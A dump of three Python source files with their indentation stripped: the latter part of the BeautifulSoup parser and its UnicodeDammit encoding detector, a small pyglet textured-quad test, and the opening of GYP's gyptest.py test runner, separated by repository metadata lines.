self.currentData = []
self.currentTag = None
self.tagStack = []
self.quoteStack = []
self.pushTag(self)
def popTag(self):
tag = self.tagStack.pop()
#print "Pop", tag.name
if self.tagStack:
self.currentTag = self.tagStack[-1]
return self.currentTag
def pushTag(self, tag):
#print "Push", tag.name
if self.currentTag:
self.currentTag.contents.append(tag)
self.tagStack.append(tag)
self.currentTag = self.tagStack[-1]
def endData(self, containerClass=NavigableString):
if self.currentData:
currentData = u''.join(self.currentData)
if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and
not set([tag.name for tag in self.tagStack]).intersection(
self.PRESERVE_WHITESPACE_TAGS)):
if '\n' in currentData:
currentData = '\n'
else:
currentData = ' '
self.currentData = []
if self.parseOnlyThese and len(self.tagStack) <= 1 and \
(not self.parseOnlyThese.text or \
not self.parseOnlyThese.search(currentData)):
return
o = containerClass(currentData)
o.setup(self.currentTag, self.previous)
if self.previous:
self.previous.next = o
self.previous = o
self.currentTag.contents.append(o)
def _popToTag(self, name, inclusivePop=True):
"""Pops the tag stack up to and including the most recent
instance of the given tag. If inclusivePop is false, pops the tag
stack up to but *not* including the most recent instqance of
the given tag."""
#print "Popping to %s" % name
if name == self.ROOT_TAG_NAME:
return
numPops = 0
mostRecentTag = None
for i in xrange(len(self.tagStack)-1, 0, -1):
if name == self.tagStack[i].name:
numPops = len(self.tagStack)-i
break
if not inclusivePop:
numPops = numPops - 1
for i in xrange(0, numPops):
mostRecentTag = self.popTag()
return mostRecentTag
def _smartPop(self, name):
"""We need to pop up to the previous tag of this type, unless
one of this tag's nesting reset triggers comes between this
tag and the previous tag of this type, OR unless this tag is a
generic nesting trigger and another generic nesting trigger
comes between this tag and the previous tag of this type.
Examples:
<p>Foo<b>Bar *<p>* should pop to 'p', not 'b'.
<p>Foo<table>Bar *<p>* should pop to 'table', not 'p'.
<p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'.
<li><ul><li> *<li>* should pop to 'ul', not the first 'li'.
<tr><table><tr> *<tr>* should pop to 'table', not the first 'tr'
<td><tr><td> *<td>* should pop to 'tr', not the first 'td'
"""
nestingResetTriggers = self.NESTABLE_TAGS.get(name)
isNestable = nestingResetTriggers != None
isResetNesting = self.RESET_NESTING_TAGS.has_key(name)
popTo = None
inclusive = True
for i in xrange(len(self.tagStack)-1, 0, -1):
p = self.tagStack[i]
if (not p or p.name == name) and not isNestable:
#Non-nestable tags get popped to the top or to their
#last occurance.
popTo = name
break
if (nestingResetTriggers is not None
and p.name in nestingResetTriggers) \
or (nestingResetTriggers is None and isResetNesting
and self.RESET_NESTING_TAGS.has_key(p.name)):
#If we encounter one of the nesting reset triggers
#peculiar to this tag, or we encounter another tag
#that causes nesting to reset, pop up to but not
#including that tag.
popTo = p.name
inclusive = False
break
p = p.parent
if popTo:
self._popToTag(popTo, inclusive)
def unknown_starttag(self, name, attrs, selfClosing=0):
#print "Start tag %s: %s" % (name, attrs)
if self.quoteStack:
#This is not a real tag.
#print "<%s> is not real!" % name
attrs = ''.join([' %s="%s"' % (x, y) for x, y in attrs])
self.handle_data('<%s%s>' % (name, attrs))
return
self.endData()
if not self.isSelfClosingTag(name) and not selfClosing:
self._smartPop(name)
if self.parseOnlyThese and len(self.tagStack) <= 1 \
and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)):
return
tag = Tag(self, name, attrs, self.currentTag, self.previous)
if self.previous:
self.previous.next = tag
self.previous = tag
self.pushTag(tag)
if selfClosing or self.isSelfClosingTag(name):
self.popTag()
if name in self.QUOTE_TAGS:
#print "Beginning quote (%s)" % name
self.quoteStack.append(name)
self.literal = 1
return tag
def unknown_endtag(self, name):
#print "End tag %s" % name
if self.quoteStack and self.quoteStack[-1] != name:
#This is not a real end tag.
#print "</%s> is not real!" % name
self.handle_data('</%s>' % name)
return
self.endData()
self._popToTag(name)
if self.quoteStack and self.quoteStack[-1] == name:
self.quoteStack.pop()
self.literal = (len(self.quoteStack) > 0)
def handle_data(self, data):
self.currentData.append(data)
def _toStringSubclass(self, text, subclass):
"""Adds a certain piece of text to the tree as a NavigableString
subclass."""
self.endData()
self.handle_data(text)
self.endData(subclass)
def handle_pi(self, text):
"""Handle a processing instruction as a ProcessingInstruction
object, possibly one with a %SOUP-ENCODING% slot into which an
encoding will be plugged later."""
if text[:3] == "xml":
text = u"xml version='1.0' encoding='%SOUP-ENCODING%'"
self._toStringSubclass(text, ProcessingInstruction)
def handle_comment(self, text):
"Handle comments as Comment objects."
self._toStringSubclass(text, Comment)
def handle_charref(self, ref):
"Handle character references as data."
if self.convertEntities:
data = unichr(int(ref))
else:
data = '&#%s;' % ref
self.handle_data(data)
def handle_entityref(self, ref):
"""Handle entity references as data, possibly converting known
HTML and/or XML entity references to the corresponding Unicode
characters."""
data = None
if self.convertHTMLEntities:
try:
data = unichr(name2codepoint[ref])
except KeyError:
pass
if not data and self.convertXMLEntities:
data = self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref)
if not data and self.convertHTMLEntities and \
not self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref):
# TODO: We've got a problem here. We're told this is
# an entity reference, but it's not an XML entity
# reference or an HTML entity reference. Nonetheless,
# the logical thing to do is to pass it through as an
# unrecognized entity reference.
#
# Except: when the input is "&carol;" this function
# will be called with input "carol". When the input is
# "AT&T", this function will be called with input
# "T". We have no way of knowing whether a semicolon
# was present originally, so we don't know whether
# this is an unknown entity or just a misplaced
# ampersand.
#
# The more common case is a misplaced ampersand, so I
# escape the ampersand and omit the trailing semicolon.
data = "&%s" % ref
if not data:
# This case is different from the one above, because we
# haven't already gone through a supposedly comprehensive
# mapping of entities to Unicode characters. We might not
# have gone through any mapping at all. So the chances are
# very high that this is a real entity, and not a
# misplaced ampersand.
data = "&%s;" % ref
self.handle_data(data)
def handle_decl(self, data):
"Handle DOCTYPEs and the like as Declaration objects."
self._toStringSubclass(data, Declaration)
def parse_declaration(self, i):
"""Treat a bogus SGML declaration as raw data. Treat a CDATA
declaration as a CData object."""
j = None
if self.rawdata[i:i+9] == '<![CDATA[':
k = self.rawdata.find(']]>', i)
if k == -1:
k = len(self.rawdata)
data = self.rawdata[i+9:k]
j = k+3
self._toStringSubclass(data, CData)
else:
try:
j = SGMLParser.parse_declaration(self, i)
except SGMLParseError:
toHandle = self.rawdata[i:]
self.handle_data(toHandle)
j = i + len(toHandle)
return j
class BeautifulSoup(BeautifulStoneSoup):
"""This parser knows the following facts about HTML:
* Some tags have no closing tag and should be interpreted as being
closed as soon as they are encountered.
* The text inside some tags (ie. 'script') may contain tags which
are not really part of the document and which should be parsed
as text, not tags. If you want to parse the text as tags, you can
always fetch it and parse it explicitly.
* Tag nesting rules:
Most tags can't be nested at all. For instance, the occurance of
a <p> tag should implicitly close the previous <p> tag.
<p>Para1<p>Para2
should be transformed into:
<p>Para1</p><p>Para2
Some tags can be nested arbitrarily. For instance, the occurance
of a <blockquote> tag should _not_ implicitly close the previous
<blockquote> tag.
Alice said: <blockquote>Bob said: <blockquote>Blah
should NOT be transformed into:
Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah
Some tags can be nested, but the nesting is reset by the
interposition of other tags. For instance, a <tr> tag should
implicitly close the previous <tr> tag within the same <table>,
but not close a <tr> tag in another table.
<table><tr>Blah<tr>Blah
should be transformed into:
<table><tr>Blah</tr><tr>Blah
but,
<tr>Blah<table><tr>Blah
should NOT be transformed into
<tr>Blah<table></tr><tr>Blah
Differing assumptions about tag nesting rules are a major source
of problems with the BeautifulSoup class. If BeautifulSoup is not
treating as nestable a tag your page author treats as nestable,
try ICantBelieveItsBeautifulSoup, MinimalSoup, or
BeautifulStoneSoup before writing your own subclass."""
def __init__(self, *args, **kwargs):
if not kwargs.has_key('smartQuotesTo'):
kwargs['smartQuotesTo'] = self.HTML_ENTITIES
kwargs['isHTML'] = True
BeautifulStoneSoup.__init__(self, *args, **kwargs)
SELF_CLOSING_TAGS = buildTagMap(None,
('br' , 'hr', 'input', 'img', 'meta',
'spacer', 'link', 'frame', 'base', 'col'))
PRESERVE_WHITESPACE_TAGS = set(['pre', 'textarea'])
QUOTE_TAGS = {'script' : None, 'textarea' : None}
#According to the HTML standard, each of these inline tags can
#contain another tag of the same type. Furthermore, it's common
#to actually use these tags this way.
NESTABLE_INLINE_TAGS = ('span', 'font', 'q', 'object', 'bdo', 'sub', 'sup',
'center')
#According to the HTML standard, these block tags can contain
#another tag of the same type. Furthermore, it's common
#to actually use these tags this way.
NESTABLE_BLOCK_TAGS = ('blockquote', 'div', 'fieldset', 'ins', 'del')
#Lists can contain other lists, but there are restrictions.
NESTABLE_LIST_TAGS = { 'ol' : [],
'ul' : [],
'li' : ['ul', 'ol'],
'dl' : [],
'dd' : ['dl'],
'dt' : ['dl'] }
#Tables can contain other tables, but there are restrictions.
NESTABLE_TABLE_TAGS = {'table' : [],
'tr' : ['table', 'tbody', 'tfoot', 'thead'],
'td' : ['tr'],
'th' : ['tr'],
'thead' : ['table'],
'tbody' : ['table'],
'tfoot' : ['table'],
}
NON_NESTABLE_BLOCK_TAGS = ('address', 'form', 'p', 'pre')
#If one of these tags is encountered, all tags up to the next tag of
#this type are popped.
RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript',
NON_NESTABLE_BLOCK_TAGS,
NESTABLE_LIST_TAGS,
NESTABLE_TABLE_TAGS)
NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS,
NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS)
# Used to detect the charset in a META tag; see start_meta
CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)", re.M)
def start_meta(self, attrs):
"""Beautiful Soup can detect a charset included in a META tag,
try to convert the document to that charset, and re-parse the
document from the beginning."""
httpEquiv = None
contentType = None
contentTypeIndex = None
tagNeedsEncodingSubstitution = False
for i in xrange(0, len(attrs)):
key, value = attrs[i]
key = key.lower()
if key == 'http-equiv':
httpEquiv = value
elif key == 'content':
contentType = value
contentTypeIndex = i
if httpEquiv and contentType: # It's an interesting meta tag.
match = self.CHARSET_RE.search(contentType)
if match:
if (self.declaredHTMLEncoding is not None or
self.originalEncoding == self.fromEncoding):
# An HTML encoding was sniffed while converting
# the document to Unicode, or an HTML encoding was
# sniffed during a previous pass through the
# document, or an encoding was specified
# explicitly and it worked. Rewrite the meta tag.
def rewrite(match):
return match.group(1) + "%SOUP-ENCODING%"
newAttr = self.CHARSET_RE.sub(rewrite, contentType)
attrs[contentTypeIndex] = (attrs[contentTypeIndex][0],
newAttr)
tagNeedsEncodingSubstitution = True
else:
# This is our first pass through the document.
# Go through it again with the encoding information.
newCharset = match.group(3)
if newCharset and newCharset != self.originalEncoding:
self.declaredHTMLEncoding = newCharset
self._feed(self.declaredHTMLEncoding)
raise StopParsing
pass
tag = self.unknown_starttag("meta", attrs)
if tag and tagNeedsEncodingSubstitution:
tag.containsSubstitutions = True
class StopParsing(Exception):
pass
class ICantBelieveItsBeautifulSoup(BeautifulSoup):
"""The BeautifulSoup class is oriented towards skipping over
common HTML errors like unclosed tags. However, sometimes it makes
errors of its own. For instance, consider this fragment:
<b>Foo<b>Bar</b></b>
This is perfectly valid (if bizarre) HTML. However, the
BeautifulSoup class will implicitly close the first b tag when it
encounters the second 'b'. It will think the author wrote
"<b>Foo<b>Bar", and didn't close the first 'b' tag, because
there's no real-world reason to bold something that's already
bold. When it encounters '</b></b>' it will close two more 'b'
tags, for a grand total of three tags closed instead of two. This
can throw off the rest of your document structure. The same is
true of a number of other tags, listed below.
It's much more common for someone to forget to close a 'b' tag
than to actually use nested 'b' tags, and the BeautifulSoup class
handles the common case. This class handles the not-co-common
case: where you can't believe someone wrote what they did, but
it's valid HTML and BeautifulSoup screwed up by assuming it
wouldn't be."""
I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \
('em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong',
'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b',
'big')
I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ('noscript',)
NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS,
I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS,
I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS)
class MinimalSoup(BeautifulSoup):
"""The MinimalSoup class is for parsing HTML that contains
pathologically bad markup. It makes no assumptions about tag
nesting, but it does know which tags are self-closing, that
<script> tags contain Javascript and should not be parsed, that
META tags may contain encoding information, and so on.
This also makes it better for subclassing than BeautifulStoneSoup
or BeautifulSoup."""
RESET_NESTING_TAGS = buildTagMap('noscript')
NESTABLE_TAGS = {}
class BeautifulSOAP(BeautifulStoneSoup):
"""This class will push a tag with only a single string child into
the tag's parent as an attribute. The attribute's name is the tag
name, and the value is the string child. An example should give
the flavor of the change:
<foo><bar>baz</bar></foo>
=>
<foo bar="baz"><bar>baz</bar></foo>
You can then access fooTag['bar'] instead of fooTag.barTag.string.
This is, of course, useful for scraping structures that tend to
use subelements instead of attributes, such as SOAP messages. Note
that it modifies its input, so don't print the modified version
out.
I'm not sure how many people really want to use this class; let me
know if you do. Mainly I like the name."""
def popTag(self):
if len(self.tagStack) > 1:
tag = self.tagStack[-1]
parent = self.tagStack[-2]
parent._getAttrMap()
if (isinstance(tag, Tag) and len(tag.contents) == 1 and
isinstance(tag.contents[0], NavigableString) and
not parent.attrMap.has_key(tag.name)):
parent[tag.name] = tag.contents[0]
BeautifulStoneSoup.popTag(self)
#Enterprise class names! It has come to our attention that some people
#think the names of the Beautiful Soup parser classes are too silly
#and "unprofessional" for use in enterprise screen-scraping. We feel
#your pain! For such-minded folk, the Beautiful Soup Consortium And
#All-Night Kosher Bakery recommends renaming this file to
#"RobustParser.py" (or, in cases of extreme enterprisiness,
#"RobustParserBeanInterface.class") and using the following
#enterprise-friendly class aliases:
class RobustXMLParser(BeautifulStoneSoup):
pass
class RobustHTMLParser(BeautifulSoup):
pass
class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup):
pass
class RobustInsanelyWackAssHTMLParser(MinimalSoup):
pass
class SimplifyingSOAPParser(BeautifulSOAP):
pass
######################################################
#
# Bonus library: Unicode, Dammit
#
# This class forces XML data into a standard format (usually to UTF-8
# or Unicode). It is heavily based on code from Mark Pilgrim's
# Universal Feed Parser. It does not rewrite the XML or HTML to
# reflect a new encoding: that happens in BeautifulStoneSoup.handle_pi
# (XML) and BeautifulSoup.start_meta (HTML).
# Autodetects character encodings.
# Download from http://chardet.feedparser.org/
try:
import chardet
# import chardet.constants
# chardet.constants._debug = 1
except ImportError:
chardet = None
# cjkcodecs and iconv_codec make Python know about more character encodings.
# Both are available from http://cjkpython.i18n.org/
# They're built in if you use Python 2.4.
try:
import cjkcodecs.aliases
except ImportError:
pass
try:
import iconv_codec
except ImportError:
pass
class UnicodeDammit:
"""A class for detecting the encoding of a *ML document and
converting it to a Unicode string. If the source encoding is
windows-1252, can replace MS smart quotes with their HTML or XML
equivalents."""
# This dictionary maps commonly seen values for "charset" in HTML
# meta tags to the corresponding Python codec names. It only covers
# values that aren't in Python's aliases and can't be determined
# by the heuristics in find_codec.
CHARSET_ALIASES = { "macintosh" : "mac-roman",
"x-sjis" : "shift-jis" }
def __init__(self, markup, overrideEncodings=[],
smartQuotesTo='xml', isHTML=False):
self.declaredHTMLEncoding = None
self.markup, documentEncoding, sniffedEncoding = \
self._detectEncoding(markup, isHTML)
self.smartQuotesTo = smartQuotesTo
self.triedEncodings = []
if markup == '' or isinstance(markup, unicode):
self.originalEncoding = None
self.unicode = unicode(markup)
return
u = None
for proposedEncoding in overrideEncodings:
u = self._convertFrom(proposedEncoding)
if u: break
if not u:
for proposedEncoding in (documentEncoding, sniffedEncoding):
u = self._convertFrom(proposedEncoding)
if u: break
# If no luck and we have auto-detection library, try that:
if not u and chardet and not isinstance(self.markup, unicode):
u = self._convertFrom(chardet.detect(self.markup)['encoding'])
# As a last resort, try utf-8 and windows-1252:
if not u:
for proposed_encoding in ("utf-8", "windows-1252"):
u = self._convertFrom(proposed_encoding)
if u: break
self.unicode = u
if not u: self.originalEncoding = None
def _subMSChar(self, orig):
"""Changes a MS smart quote character to an XML or HTML
entity."""
sub = self.MS_CHARS.get(orig)
if isinstance(sub, tuple):
if self.smartQuotesTo == 'xml':
sub = '&#x%s;' % sub[1]
else:
sub = '&%s;' % sub[0]
return sub
def _convertFrom(self, proposed):
proposed = self.find_codec(proposed)
if not proposed or proposed in self.triedEncodings:
return None
self.triedEncodings.append(proposed)
markup = self.markup
# Convert smart quotes to HTML if coming from an encoding
# that might have them.
if self.smartQuotesTo and proposed.lower() in("windows-1252",
"iso-8859-1",
"iso-8859-2"):
markup = re.compile("([\x80-\x9f])").sub \
(lambda(x): self._subMSChar(x.group(1)),
markup)
try:
# print "Trying to convert document to %s" % proposed
u = self._toUnicode(markup, proposed)
self.markup = u
self.originalEncoding = proposed
except Exception, e:
# print "That didn't work!"
# print e
return None
#print "Correct encoding: %s" % proposed
return self.markup
def _toUnicode(self, data, encoding):
'''Given a string and its encoding, decodes the string into Unicode.
%encoding is a string recognized by encodings.aliases'''
# strip Byte Order Mark (if present)
if (len(data) >= 4) and (data[:2] == '\xfe\xff') \
and (data[2:4] != '\x00\x00'):
encoding = 'utf-16be'
data = data[2:]
elif (len(data) >= 4) and (data[:2] == '\xff\xfe') \
and (data[2:4] != '\x00\x00'):
encoding = 'utf-16le'
data = data[2:]
elif data[:3] == '\xef\xbb\xbf':
encoding = 'utf-8'
data = data[3:]
elif data[:4] == '\x00\x00\xfe\xff':
encoding = 'utf-32be'
data = data[4:]
elif data[:4] == '\xff\xfe\x00\x00':
encoding = 'utf-32le'
data = data[4:]
newdata = unicode(data, encoding)
return newdata
def _detectEncoding(self, xml_data, isHTML=False):
"""Given a document, tries to detect its XML encoding."""
xml_encoding = sniffed_xml_encoding = None
try:
if xml_data[:4] == '\x4c\x6f\xa7\x94':
# EBCDIC
xml_data = self._ebcdic_to_ascii(xml_data)
elif xml_data[:4] == '\x00\x3c\x00\x3f':
# UTF-16BE
sniffed_xml_encoding = 'utf-16be'
xml_data = unicode(xml_data, 'utf-16be').encode('utf-8')
elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \
and (xml_data[2:4] != '\x00\x00'):
# UTF-16BE with BOM
sniffed_xml_encoding = 'utf-16be'
xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8')
elif xml_data[:4] == '\x3c\x00\x3f\x00':
# UTF-16LE
sniffed_xml_encoding = 'utf-16le'
xml_data = unicode(xml_data, 'utf-16le').encode('utf-8')
elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \
(xml_data[2:4] != '\x00\x00'):
# UTF-16LE with BOM
sniffed_xml_encoding = 'utf-16le'
xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8')
elif xml_data[:4] == '\x00\x00\x00\x3c':
# UTF-32BE
sniffed_xml_encoding = 'utf-32be'
xml_data = unicode(xml_data, 'utf-32be').encode('utf-8')
elif xml_data[:4] == '\x3c\x00\x00\x00':
# UTF-32LE
sniffed_xml_encoding = 'utf-32le'
xml_data = unicode(xml_data, 'utf-32le').encode('utf-8')
elif xml_data[:4] == '\x00\x00\xfe\xff':
# UTF-32BE with BOM
sniffed_xml_encoding = 'utf-32be'
xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8')
elif xml_data[:4] == '\xff\xfe\x00\x00':
# UTF-32LE with BOM
sniffed_xml_encoding = 'utf-32le'
xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8')
elif xml_data[:3] == '\xef\xbb\xbf':
# UTF-8 with BOM
sniffed_xml_encoding = 'utf-8'
xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8')
else:
sniffed_xml_encoding = 'ascii'
pass
except:
xml_encoding_match = None
xml_encoding_match = re.compile(
'^<\?.*encoding=[\'"](.*?)[\'"].*\?>').match(xml_data)
if not xml_encoding_match and isHTML:
regexp = re.compile('<\s*meta[^>]+charset=([^>]*?)[;\'">]', re.I)
xml_encoding_match = regexp.search(xml_data)
if xml_encoding_match is not None:
xml_encoding = xml_encoding_match.groups()[0].lower()
if isHTML:
self.declaredHTMLEncoding = xml_encoding
if sniffed_xml_encoding and \
(xml_encoding in ('iso-10646-ucs-2', 'ucs-2', 'csunicode',
'iso-10646-ucs-4', 'ucs-4', 'csucs4',
'utf-16', 'utf-32', 'utf_16', 'utf_32',
'utf16', 'u16')):
xml_encoding = sniffed_xml_encoding
return xml_data, xml_encoding, sniffed_xml_encoding
def find_codec(self, charset):
return self._codec(self.CHARSET_ALIASES.get(charset, charset)) \
or (charset and self._codec(charset.replace("-", ""))) \
or (charset and self._codec(charset.replace("-", "_"))) \
or charset
def _codec(self, charset):
if not charset: return charset
codec = None
try:
codecs.lookup(charset)
codec = charset
except (LookupError, ValueError):
pass
return codec
EBCDIC_TO_ASCII_MAP = None
def _ebcdic_to_ascii(self, s):
c = self.__class__
if not c.EBCDIC_TO_ASCII_MAP:
emap = (0,1,2,3,156,9,134,127,151,141,142,11,12,13,14,15,
16,17,18,19,157,133,8,135,24,25,146,143,28,29,30,31,
128,129,130,131,132,10,23,27,136,137,138,139,140,5,6,7,
144,145,22,147,148,149,150,4,152,153,154,155,20,21,158,26,
32,160,161,162,163,164,165,166,167,168,91,46,60,40,43,33,
38,169,170,171,172,173,174,175,176,177,93,36,42,41,59,94,
45,47,178,179,180,181,182,183,184,185,124,44,37,95,62,63,
186,187,188,189,190,191,192,193,194,96,58,35,64,39,61,34,
195,97,98,99,100,101,102,103,104,105,196,197,198,199,200,
201,202,106,107,108,109,110,111,112,113,114,203,204,205,
206,207,208,209,126,115,116,117,118,119,120,121,122,210,
211,212,213,214,215,216,217,218,219,220,221,222,223,224,
225,226,227,228,229,230,231,123,65,66,67,68,69,70,71,72,
73,232,233,234,235,236,237,125,74,75,76,77,78,79,80,81,
82,238,239,240,241,242,243,92,159,83,84,85,86,87,88,89,
90,244,245,246,247,248,249,48,49,50,51,52,53,54,55,56,57,
250,251,252,253,254,255)
import string
c.EBCDIC_TO_ASCII_MAP = string.maketrans( \
''.join(map(chr, xrange(256))), ''.join(map(chr, emap)))
return s.translate(c.EBCDIC_TO_ASCII_MAP)
MS_CHARS = { '\x80' : ('euro', '20AC'),
'\x81' : ' ',
'\x82' : ('sbquo', '201A'),
'\x83' : ('fnof', '192'),
'\x84' : ('bdquo', '201E'),
'\x85' : ('hellip', '2026'),
'\x86' : ('dagger', '2020'),
'\x87' : ('Dagger', '2021'),
'\x88' : ('circ', '2C6'),
'\x89' : ('permil', '2030'),
'\x8A' : ('Scaron', '160'),
'\x8B' : ('lsaquo', '2039'),
'\x8C' : ('OElig', '152'),
'\x8D' : '?',
'\x8E' : ('#x17D', '17D'),
'\x8F' : '?',
'\x90' : '?',
'\x91' : ('lsquo', '2018'),
'\x92' : ('rsquo', '2019'),
'\x93' : ('ldquo', '201C'),
'\x94' : ('rdquo', '201D'),
'\x95' : ('bull', '2022'),
'\x96' : ('ndash', '2013'),
'\x97' : ('mdash', '2014'),
'\x98' : ('tilde', '2DC'),
'\x99' : ('trade', '2122'),
'\x9a' : ('scaron', '161'),
'\x9b' : ('rsaquo', '203A'),
'\x9c' : ('oelig', '153'),
'\x9d' : '?',
'\x9e' : ('#x17E', '17E'),
'\x9f' : ('Yuml', ''),}
#######################################################################
#By default, act as an HTML pretty-printer.
if __name__ == '__main__':
import sys
soup = BeautifulSoup(sys.stdin)
print soup.prettify()
|
qbektrix/pyglet
|
refs/heads/master
|
experimental/buffer/test_image.py
|
28
|
#!/usr/bin/python
# $Id:$
from pyglet.gl import *
from pyglet import graphics
from pyglet import image
from pyglet import window
win = window.Window()
kitten = image.load('examples/programming_guide/kitten.jpg').texture
batch = graphics.Batch()
t = kitten.tex_coords
w = kitten.width
h = kitten.height
batch.add(4, GL_QUADS, graphics.TextureState(kitten),
('v3f', (0., 0., 0.) + (w, 0., 0.) + (w, h, 0.) + (0., h, 0.)),
('t3f', t))
while not win.has_exit:
win.dispatch_events()
win.clear()
batch.draw()
win.flip()
|
johnservinis/node-gyp
|
refs/heads/master
|
gyp/gyptest.py
|
80
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
__doc__ = """
gyptest.py -- test runner for GYP tests.
"""
import os
import optparse
import subprocess
import sys
class CommandRunner:
"""
Executor class for commands, including "commands" implemented by
Python functions.
"""
verbose = True
active = True
def __init__(self, dictionary={}):
self.subst_dictionary(dictionary)
def subst_dictionary(self, dictionary):
self._subst_dictionary = dictionary
def subst(self, string, dictionary=None):
"""
Substitutes (via the format operator) the values in the specified
dictionary into the specified command.
The command can be an (action, string) tuple. In all cases, we
perform substitution on strings and don't worry if something isn't
a string. (It's probably a Python function to be executed.)
"""
if dictionary is None:
dictionary = self._subst_dictionary
if dictionary:
try:
string = string % dictionary
except TypeError:
pass
return string
def display(self, command, stdout=None, stderr=None):
if not self.verbose:
return
if type(command) == type(()):
func = command[0]
args = command[1:]
s = '%s(%s)' % (func.__name__, ', '.join(map(repr, args)))
if type(command) == type([]):
# TODO: quote arguments containing spaces
# TODO: handle meta characters?
s = ' '.join(command)
else:
s = self.subst(command)
if not s.endswith('\n'):
s += '\n'
sys.stdout.write(s)
sys.stdout.flush()
def execute(self, command, stdout=None, stderr=None):
"""
Executes a single command.
"""
if not self.active:
return 0
if type(command) == type(''):
command = self.subst(command)
cmdargs = shlex.split(command)
if cmdargs[0] == 'cd':
command = (os.chdir,) + tuple(cmdargs[1:])
if type(command) == type(()):
func = command[0]
args = command[1:]
return func(*args)
else:
if stdout is sys.stdout:
# Same as passing sys.stdout, except python2.4 doesn't fail on it.
subout = None
else:
# Open pipe for anything else so Popen works on python2.4.
subout = subprocess.PIPE
if stderr is sys.stderr:
# Same as passing sys.stderr, except python2.4 doesn't fail on it.
suberr = None
elif stderr is None:
# Merge with stdout if stderr isn't specified.
suberr = subprocess.STDOUT
else:
# Open pipe for anything else so Popen works on python2.4.
suberr = subprocess.PIPE
p = subprocess.Popen(command,
shell=(sys.platform == 'win32'),
stdout=subout,
stderr=suberr)
p.wait()
if stdout is None:
self.stdout = p.stdout.read()
elif stdout is not sys.stdout:
stdout.write(p.stdout.read())
if stderr not in (None, sys.stderr):
stderr.write(p.stderr.read())
return p.returncode
def run(self, command, display=None, stdout=None, stderr=None):
"""
Runs a single command, displaying it first.
"""
if display is None:
display = command
self.display(display)
return self.execute(command, stdout, stderr)
class Unbuffered:
def __init__(self, fp):
self.fp = fp
def write(self, arg):
self.fp.write(arg)
self.fp.flush()
def __getattr__(self, attr):
return getattr(self.fp, attr)
sys.stdout = Unbuffered(sys.stdout)
sys.stderr = Unbuffered(sys.stderr)
def find_all_gyptest_files(directory):
result = []
for root, dirs, files in os.walk(directory):
if '.svn' in dirs:
dirs.remove('.svn')
result.extend([ os.path.join(root, f) for f in files
if f.startswith('gyptest') and f.endswith('.py') ])
result.sort()
return result
def main(argv=None):
if argv is None:
argv = sys.argv
usage = "gyptest.py [-ahlnq] [-f formats] [test ...]"
parser = optparse.OptionParser(usage=usage)
parser.add_option("-a", "--all", action="store_true",
help="run all tests")
parser.add_option("-C", "--chdir", action="store", default=None,
help="chdir to the specified directory")
parser.add_option("-f", "--format", action="store", default='',
help="run tests with the specified formats")
parser.add_option("-G", '--gyp_option', action="append", default=[],
help="Add -G options to the gyp command line")
parser.add_option("-l", "--list", action="store_true",
help="list available tests and exit")
parser.add_option("-n", "--no-exec", action="store_true",
help="no execute, just print the command line")
parser.add_option("--passed", action="store_true",
help="report passed tests")
parser.add_option("--path", action="append", default=[],
help="additional $PATH directory")
parser.add_option("-q", "--quiet", action="store_true",
help="quiet, don't print test command lines")
opts, args = parser.parse_args(argv[1:])
if opts.chdir:
os.chdir(opts.chdir)
if opts.path:
extra_path = [os.path.abspath(p) for p in opts.path]
extra_path = os.pathsep.join(extra_path)
os.environ['PATH'] += os.pathsep + extra_path
if not args:
if not opts.all:
sys.stderr.write('Specify -a to get all tests.\n')
return 1
args = ['test']
tests = []
for arg in args:
if os.path.isdir(arg):
tests.extend(find_all_gyptest_files(os.path.normpath(arg)))
else:
tests.append(arg)
if opts.list:
for test in tests:
print test
sys.exit(0)
CommandRunner.verbose = not opts.quiet
CommandRunner.active = not opts.no_exec
cr = CommandRunner()
os.environ['PYTHONPATH'] = os.path.abspath('test/lib')
if not opts.quiet:
sys.stdout.write('PYTHONPATH=%s\n' % os.environ['PYTHONPATH'])
passed = []
failed = []
no_result = []
if opts.format:
format_list = opts.format.split(',')
else:
# TODO: not duplicate this mapping from pylib/gyp/__init__.py
format_list = {
'freebsd7': ['make'],
'freebsd8': ['make'],
'openbsd5': ['make'],
'cygwin': ['msvs'],
'win32': ['msvs', 'ninja'],
'linux2': ['make', 'ninja'],
'linux3': ['make', 'ninja'],
'darwin': ['make', 'ninja', 'xcode'],
}[sys.platform]
for format in format_list:
os.environ['TESTGYP_FORMAT'] = format
if not opts.quiet:
sys.stdout.write('TESTGYP_FORMAT=%s\n' % format)
gyp_options = []
for option in opts.gyp_option:
gyp_options += ['-G', option]
if gyp_options and not opts.quiet:
sys.stdout.write('Extra Gyp options: %s\n' % gyp_options)
for test in tests:
status = cr.run([sys.executable, test] + gyp_options,
stdout=sys.stdout,
stderr=sys.stderr)
if status == 2:
no_result.append(test)
elif status:
failed.append(test)
else:
passed.append(test)
if not opts.quiet:
def report(description, tests):
if tests:
if len(tests) == 1:
